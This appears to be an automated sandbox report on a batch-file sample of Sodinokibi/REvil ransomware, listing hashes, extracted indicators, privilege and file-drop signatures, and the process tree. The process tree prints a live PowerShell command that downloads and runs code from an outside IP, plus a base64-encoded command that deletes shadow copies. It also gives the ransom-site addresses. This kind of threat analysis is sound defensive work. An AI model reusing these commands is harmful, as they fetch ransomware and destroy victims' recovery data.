Analysis
-
max time kernel
17s -
max time network
55s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
74b8e8ad8fe5aea82ec95a707e3c2b94.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
74b8e8ad8fe5aea82ec95a707e3c2b94.bat
Resource
win10v200430
General
-
Target
74b8e8ad8fe5aea82ec95a707e3c2b94.bat
-
Size
214B
-
MD5
220dc0fc858c664ba5223cbab7e4b312
-
SHA1
94f095bd648c7c3f4845e3c419b74baa7662f2ae
-
SHA256
94d89a44ea5da3649df80f6898cb30415f2df92c0060d36d5f9afa3806862a2a
-
SHA512
119c413acb39f51f4d668c5bc48793f60b91717e1623e22d666221c26e78cfa3667e7aa2141b26e15aa3936d86ba498ae280decd9889a77f8706459d0f295772
Malware Config
Extracted
http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94
Extracted
C:\ysm83m-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFB753AC85BE73BF
http://decryptor.cc/CFB753AC85BE73BF
Signatures
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 108 powershell.exe Token: SeDebugPrivilege 108 powershell.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeBackupPrivilege 464 vssvc.exe Token: SeRestorePrivilege 464 vssvc.exe Token: SeAuditPrivilege 464 vssvc.exe Token: SeTakeOwnershipPrivilege 108 powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\InitializeSubmit.vstm powershell.exe File opened for modification \??\c:\program files\RegisterGet.mp4 powershell.exe File opened for modification \??\c:\program files\UseWait.mpeg powershell.exe File opened for modification \??\c:\program files\CloseCompare.001 powershell.exe File opened for modification \??\c:\program files\DenyAssert.3gp2 powershell.exe File opened for modification \??\c:\program files\DebugConnect.shtml powershell.exe File opened for modification \??\c:\program files\NewMount.3gpp powershell.exe File opened for modification \??\c:\program files\PushPop.MTS powershell.exe File opened for modification \??\c:\program files\RenameSplit.gif powershell.exe File opened for modification \??\c:\program files\UnblockExpand.dot powershell.exe File opened for modification \??\c:\program files\WatchLimit.jpeg powershell.exe File created \??\c:\program files (x86)\ysm83m-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointNew.pcx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\ysm83m-readme.txt powershell.exe File opened for modification \??\c:\program files\RedoRestart.asf powershell.exe File opened for modification \??\c:\program files\SkipExpand.ttc powershell.exe File opened for modification \??\c:\program files\SyncExit.TS powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\ysm83m-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ysm83m-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromCompare.aiff powershell.exe File opened for modification \??\c:\program files\MergePop.gif powershell.exe File opened for modification \??\c:\program files\MountCopy.docx powershell.exe File opened for modification \??\c:\program files\ProtectRevoke.xla powershell.exe File opened for modification \??\c:\program files\WatchSync.vb powershell.exe File created \??\c:\program files\ysm83m-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearUnlock.snd powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1524 wrote to memory of 108 1524 cmd.exe powershell.exe PID 108 wrote to memory of 1172 108 powershell.exe powershell.exe PID 108 wrote to memory of 1172 108 powershell.exe powershell.exe PID 108 wrote to memory of 1172 108 powershell.exe powershell.exe PID 108 wrote to memory of 1172 108 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 108 powershell.exe 108 powershell.exe 108 powershell.exe 1172 powershell.exe 1172 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 108 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 108 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\74b8e8ad8fe5aea82ec95a707e3c2b94.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94');Invoke-ZUMTYKU;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1172
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:464